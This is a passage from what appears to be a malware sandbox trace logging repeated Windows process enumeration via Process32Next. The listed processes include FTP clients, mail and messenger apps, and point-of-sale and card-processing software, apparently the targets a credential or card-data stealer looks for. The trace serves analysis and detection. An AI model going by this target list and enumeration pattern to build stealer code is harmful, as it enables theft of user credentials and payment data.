(in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0293.927] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0293.928] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0293.930] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0293.932] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0293.937] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0293.939] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0293.940] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0293.942] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x670, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0293.943] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="degree_sing_pretty.exe")) returned 1 [0293.945] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="work-heavy.exe")) returned 1 [0293.954] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0293.957] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="real-new.exe")) returned 1 [0293.960] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter.exe")) returned 1 [0293.962] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightwhere.exe")) returned 1 [0293.966] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge_model_ready.exe")) returned 1 [0293.968] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fearfew.exe")) returned 1 [0293.970] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bag-begin-gas.exe")) returned 1 [0293.972] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="take whether.exe")) returned 1 [0293.974] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="common trade station.exe")) returned 1 [0293.976] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="small_money.exe")) returned 1 [0293.977] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazineofficialteach.exe")) returned 1 [0293.981] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="involve.exe")) returned 1 [0293.983] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious_free_generation.exe")) returned 1 [0293.985] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hair friend will.exe")) returned 1 [0293.987] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whose.exe")) returned 1 [0293.989] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0293.990] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0293.992] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0293.999] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0294.000] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0294.002] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0294.004] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0294.005] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0294.007] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0294.009] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0294.014] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0294.016] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0294.018] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0294.020] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0294.022] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0294.024] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0294.025] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0294.030] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0294.032] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0294.034] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0294.035] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0294.044] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0294.046] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0294.048] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0294.049] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0294.051] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0294.053] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0294.055] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0294.057] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0294.062] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0294.064] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0294.066] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0294.068] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0294.070] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0294.072] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0294.077] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0294.079] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0294.082] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0294.084] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0294.091] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0294.093] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0294.094] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0294.096] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0294.098] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="discussion.exe")) returned 1 [0294.100] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="styledesignbusiness.exe")) returned 1 [0294.102] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="new_door.exe")) returned 1 [0294.104] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bed fight.exe")) returned 1 [0294.108] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="federal hotel.exe")) returned 1 [0294.110] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0294.112] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0294.114] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0294.116] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0294.117] CloseHandle (hObject=0x224c) returned 1 [0294.117] Sleep (dwMilliseconds=0x64) [0294.246] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x224c [0294.331] Process32First (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0294.334] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x73, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0294.336] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0294.338] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0294.341] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0294.344] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, 